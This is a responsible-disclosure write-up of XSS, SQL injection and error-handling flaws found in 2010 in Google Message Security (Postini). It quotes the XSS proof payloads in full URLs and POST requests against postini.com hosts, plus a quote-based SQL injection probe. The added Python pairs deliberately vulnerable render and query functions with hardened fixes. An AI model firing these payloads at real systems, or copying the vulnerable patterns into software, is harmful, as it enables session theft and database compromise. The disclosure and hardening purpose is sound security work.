NOTE: all the vulnerabilities discussed in this article were responsibly disclosed to Google back in January 2010.
While driving an initiative on 'Testing the Enterprise Security Infrastructure', I spent some time at the beginning of the year assessing SaaS (Software-as-a-Service) enterprise e-mail security solutions. That is how I came across Google Message Security (powered by Postini). Bundled with Google Apps Premiere, you can easily get your hands on the Google e-mail security services for $50/year - a real bargain :)
After setting up my Google Apps Premiere account, there it was. From the Apps account, two Google Message Security services were available: the Security Console (Admin console), used to manage the organization's resources (domains, users, filtering rules, etc.), and the Message Center, used by end-users to manage their quarantined e-mails and filtering settings. The Message Center comes in two flavors: Message Center II is the latest version (set by default for end-users), but the older user interface, known as Message Center Classic, was still accessible to an authenticated user (after tweaking the URL a bit).
The original plan was to refresh an older security test plan I had used for assessing various products from Barracuda Networks and Symantec. However, I quickly realized that I had got much more than I bargained for. The Google Message Security SaaS was affected by multiple security vulnerabilities, including several persistent and reflected Cross-Site Scripting (XSS) issues, improper error handling, and the most interesting of all, SQL Injection.
And here they are!
A. Multiple XSS vulnerabilities in Security Console
(MVSA-10-002)
First, a persistent XSS vulnerability affecting the /exec/admin_orgs resource allowed injecting and persistently storing malicious scripting code via the setconf-neworg parameter:
setconf-neworg=test%3Cimg+onmouseover%3D%22javascript%3A+alert%28document.cookie%29%22%3E
The attack persisted the malicious scripting code into the name of a new organization. When the organization's details were queried, the malicious scripting code executed in the client's browser.
Multiple reflected XSS vulnerabilities were also identified in the /exec/admin_list and /exec/admin_auth resources:
- in ORGS and USERS > Organization
https://ac-s200.postini.com/exec/admin_list?type=orgs&sortkeys=orgtag:h22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://ac-s200.postini.com/exec/admin_list?type=orgs&sortkeys=orgtag:h&orgtagqs=%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
...
- in ORGS and USERS > Users
https://ac-s200.postini.com/exec/admin_list?type=users&childorgs=0&type_of_user=all&addressqs=&aliases=1&childorgs=1"><>&Search=Search
- in ORGS and USERS > Authorization
POST /exec/admin_auth?action=display_summary HTTP/1.1
Host: ac-s200.postini.com
...
redir=+List+&targetAddress=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%2Fiframe%3E&targetOrg=%5Bdomain.com%5D+Account+Administrators&currentOrg=100059875
... and so on.
B. Multiple reflected XSS in Message Center Classic
(MVSA-10-002)
Following the submission of incorrectly formatted e-mail addresses for the Approved and Blocked senders lists, the injected malicious code was included in the invalid e-mail format error messages displayed to the user.
POST /exec/MsgSet?action=change_MsgSettings HTTP/1.1
Host: mc-s200.postini.com
...
add-good_addresses=a%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Save+to+List&submit=Save+to+List
The result is shown below:
C. Reflected XSS in Message Center II
(MVSA-10-002)
Manipulation of the source_uri parameter of the /msgctr/message_display resource allowed reflected XSS attacks:
https://ac-s200.postini.com/msgctr/message_display?id=yyy&trash=trash&source_uri=%2Fapp%2Fmsgctr%2Ftrash%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
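The three XSS cases above (stored organization name, echoed error message, attribute-context source_uri) share one root cause: untrusted strings concatenated into markup without output encoding. The following added example is not Postini's code; it re-renders each payload from the requests above in a vulnerable and a hardened form, and uses a parser to show which output still contains live tags (the render helper names and the fallback path are assumptions).

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# The payloads quoted in the requests above, URL-decoded.
ORG_NAME = unquote_plus("test%3Cimg+onmouseover%3D%22javascript%3A+alert%28document.cookie%29%22%3E")
SOURCE_URI = unquote_plus("%2Fapp%2Fmsgctr%2Ftrash%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E")
BAD_ADDRESS = unquote_plus("a%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E")

def render_org_vulnerable(name):
    # Stored organization name concatenated into markup: the <img onmouseover> survives.
    return f"<td>{name}</td>"

def render_org(name):
    # Text context: encode on output, whatever was accepted at input time.
    return f"<td>{html.escape(name)}</td>"

def render_back_link_vulnerable(source_uri):
    # Attribute context: the decoded %22 closes href="..." and <script> lands in the page.
    return f'<a href="{source_uri}">Back</a>'

def render_back_link(source_uri):
    # Only a same-origin path is accepted as a return target (fallback path assumed),
    # and quote=True turns " into &quot; so the attribute cannot be closed early.
    if not source_uri.startswith("/") or source_uri.startswith("//"):
        source_uri = "/app/msgctr/"
    return f'<a href="{html.escape(source_uri, quote=True)}">Back</a>'

def address_error(address):
    # The Message Center Classic case: an error message that echoes the rejected
    # value must encode it like any other untrusted string.
    return f"<p>{html.escape(address)} is not a valid e-mail address.</p>"

class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(fragment):
    # Parse the rendered fragment the way a browser would and list the tags it
    # actually contains: the reliable way to tell escaped text from live markup.
    parser = _TagCollector()
    parser.feed(fragment)
    return parser.tags
```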
D. Improper Error Handling in Security Console
(MVSA-10-003)
Manipulation of the beg_date and end_date parameters of the /exec/adminRep resource returned the following error:
----------------------
There was a problem processing your request. Please click the Back button and try again.
If you continue to see the problem, please report it to your system administrator or support contact with the following information.
Time: Thu Jan 21 23:53:08 2010 GMT Request ID: 20593BC6-06E8-11DF-93DD-E3695903FD3E
Request URL: /exec/adminRep?action=displayReport&targetorgid=100059876&cat=out_virus&report=sender&beg_date=20100120%27&end_date=20100120&org_agg=orgh
System: ac-s200.postini.com-
Message: function(): not a valid date at /product/build/folder1/folder2/component line 137.
----------------
The returned error disclosed details about the component implementing the functionality, its location on the server, and the technology being used. It could be handy for devising further attacks ;)
E. SQL Injection in Message Center II
(MVSA-10-001)
Manipulation of the sort_direction parameter of the /junk_quarantine/process and /trash/process resources allowed successful SQL Injection attacks against the Message Center II service.
POST https://mc-s200.postini.com/app/msgctr/junk_quarantine/process HTTP/1.1
Host: mc-s200.postini.com
...
Content-Type: multipart/form-data; boundary=---------------------------26418279386900
Content-Length: 1351
-----------------------------26418279386900
Content-Disposition: form-data; name="_submitted_junk_quarantine_form"
1
...
-----------------------------26418279386900
Content-Disposition: form-data; name="range_menu"
1-14
-----------------------------26418279386900
Content-Disposition: form-data; name="sort_menu"
from_asc
-----------------------------26418279386900
Content-Disposition: form-data; name="sort_direction"
desc'
-----------------------------26418279386900
...
The extra apostrophe used for the initial test caused the following system error:
Apart from providing details on the database engine used, the error type and middleware settings, the returned error confirmed that the service was vulnerable to SQL Injection. Additional test cases were devised to confirm the issue.
As confirmed by the Google Security Team, these vulnerabilities affected Google Message Security releases 6_24 (January), 6_25 (Feb), 6_26 (March) and 6_27 (April). Additional details are available in the MVSA-10-001, MVSA-10-002 and MVSA-10-003 security advisories.
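Sections D and E are two sides of the same handler problem: a request value reaching an ORDER BY clause verbatim, and the resulting engine error being echoed to the browser. The added example below is not Postini's code; it models the /junk_quarantine/process form with a constructed SQLite table (schema, field semantics and the handler shape are assumptions) and shows an allow-list mapping for sort_menu/sort_direction next to a response path that returns only a generic message and request id.

```python
import logging
import sqlite3
import uuid

# Constructed in-memory stand-in for a quarantine table; not Postini's real schema.
ROWS = [("alice@example.com", "Re: invoice"),
        ("bob@example.com", "Weekly report"),
        ("carol@example.com", "Lunch?")]

# Allow-lists: the only strings that may ever reach the ORDER BY clause.
SORT_COLUMNS = {"from": "sender", "subject": "subject"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE quarantine (sender TEXT, subject TEXT)")
    conn.executemany("INSERT INTO quarantine VALUES (?, ?)", ROWS)
    return conn

def senders_vulnerable(conn, column, sort_direction):
    # Request values pasted into SQL: sort_direction="desc'" breaks the statement
    # and the engine's own error text is what leaked back to the browser.
    sql = f"SELECT sender FROM quarantine ORDER BY {column} {sort_direction}"
    return [row[0] for row in conn.execute(sql)]

def senders_hardened(conn, sort_menu, sort_direction, limit):
    # Map request values onto fixed SQL fragments; anything else is rejected
    # before a query is built. The numeric limit is bound as a parameter.
    column = SORT_COLUMNS.get(sort_menu)
    direction = SORT_DIRECTIONS.get(sort_direction)
    if column is None or direction is None:
        raise ValueError("sort parameters outside allow-list")
    sql = f"SELECT sender FROM quarantine ORDER BY {column} {direction} LIMIT ?"
    return [row[0] for row in conn.execute(sql, (limit,))]

def handle_process(conn, form):
    # The client only ever sees a generic message plus an opaque request id;
    # engine, file path and line number stay in the server log for correlation.
    request_id = uuid.uuid4().hex.upper()
    try:
        senders = senders_hardened(conn, form.get("sort_menu", "from"),
                                   form.get("sort_direction", "asc"), 14)
        return {"status": 200, "senders": senders}
    except ValueError:
        return {"status": 400, "error": "invalid request", "request_id": request_id}
    except sqlite3.Error:
        logging.getLogger("msgctr").exception("request %s failed", request_id)
        return {"status": 500, "error": "There was a problem processing your request.",
                "request_id": request_id}
```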
Enjoy!